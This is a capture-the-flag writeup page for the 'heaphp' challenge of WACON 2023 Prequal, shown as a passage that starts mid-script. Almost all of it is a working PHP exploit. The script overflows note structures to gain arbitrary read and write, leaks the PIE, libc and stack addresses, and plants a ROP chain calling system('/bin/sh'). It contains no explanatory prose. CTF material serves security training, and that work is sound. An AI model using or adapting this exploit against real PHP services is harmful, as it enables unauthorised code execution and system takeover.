CTFtime.org / WACON 2023 Prequal / heaphp / Writeup

```
> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);

$buf = view_note(1);
$lic = (ord($buf[0]))+(ord($buf[1])*256)+(ord($buf[2])*256*256)+(ord($buf[3])*256*256*256)+(ord($buf[4])*256*256*256*256)+(ord($buf[5])*256*256*256*256*256)+(ord($buf[6])*256*256*256*256*256*256);

$pie_base = $lic - 0x16f200;
echo "pie_base : ";
echo $pie_base;
echo "
";

$base_to_libc = $pie_base + 0x544ff0;
echo "base_to_libc : ";
echo $base_to_libc;
echo "
";

$addr1 = $base_to_libc & 0xffffffff;
$addr2 = $base_to_libc >> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);

$libc_base = $lic - 0x29dc0;
echo "libc_base : ";
echo $libc_base;
echo "
";

$environ = $libc_base + 0xb2f2d0 - 8192;
echo "environ : ";
echo $environ;
echo "
";

$addr1 = $environ & 0xffffffff;
$addr2 = $environ >> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);

$stack = $lic;
echo "stack : ";
echo $stack;
echo "
";

$gadget = $libc_base + 0x000000000002a3e5;
echo "gadget : ";
echo $gadget;
echo "
";

$addr1 = $gadget & 0xffffffff;
$addr2 = $gadget >> 32;
$rop_1 = pack("V", $addr1).pack("V", $addr2);

$binsh = $libc_base + 0x1d8698;
echo "binsh : ";
echo $binsh;
echo "
";

$addr1 = $binsh & 0xffffffff;
$addr2 = $binsh >> 32;
$rop_2 = pack("V", $addr1).pack("V", $addr2);

$system = $libc_base + 0x50d60;
echo "system : ";
echo $system;
echo "
";

$addr1 = $system & 0xffffffff;
$addr2 = $system >> 32;
$rop_3 = pack("V", $addr1).pack("V", $addr2);

$gadget2 = $libc_base + 0x000000000002a3e5 +1;
echo "gadget2 : ";
echo $gadget;
echo "
";

$addr1 = $gadget2 & 0xffffffff;
$addr2 = $gadget2 >> 32;
$rop_4 = pack("V", $addr1).pack("V", $addr2);

$ret = $stack - 0x3a48 + 0x8 + 0x8 + 0x8;
echo "ret : ";
echo $ret;
echo "
";

$addr1 = $ret & 0xffffffff;
$addr2 = $ret >> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
edit_note(1, $rop_3[0].$rop_3[1].$rop_3[2].$rop_3[3].$rop_3[4].$rop_3[5].$rop_3[6].$rop_3[7]);

$ret = $stack - 0x3a48 + 0x8 + 0x8;
echo "ret : ";
echo $ret;
echo "
";

$addr1 = $ret & 0xffffffff;
$addr2 = $ret >> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
edit_note(1, $rop_4[0].$rop_4[1].$rop_4[2].$rop_4[3].$rop_4[4].$rop_4[5].$rop_4[6].$rop_4[7]);

$ret = $stack - 0x3a48 + 0x8;
echo "ret : ";
echo $ret;
echo "
";

$addr1 = $ret & 0xffffffff;
$addr2 = $ret >> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
edit_note(1, $rop_2[0].$rop_2[1].$rop_2[2].$rop_2[3].$rop_2[4].$rop_2[5].$rop_2[6].$rop_2[7]);

$ret = $stack - 0x3a48;
echo "ret : ";
echo $ret;
echo "
";

$addr1 = $ret & 0xffffffff;
$addr2 = $ret >> 32;
$addr = pack("V", $addr1).pack("V", $addr2);

delete_note(0);
add_note("x1","aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\x00"."aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"."\xff\00\00\00\00\00\00\00".$addr);
edit_note(1, $rop_1[0].$rop_1[1].$rop_1[2].$rop_1[3].$rop_1[4].$rop_1[5].$rop_1[6].$rop_1[7]);

echo "END";

?>
```

Original writeup (https://uz56764.tistory.com/110).

heaphp

Comments

Sign in with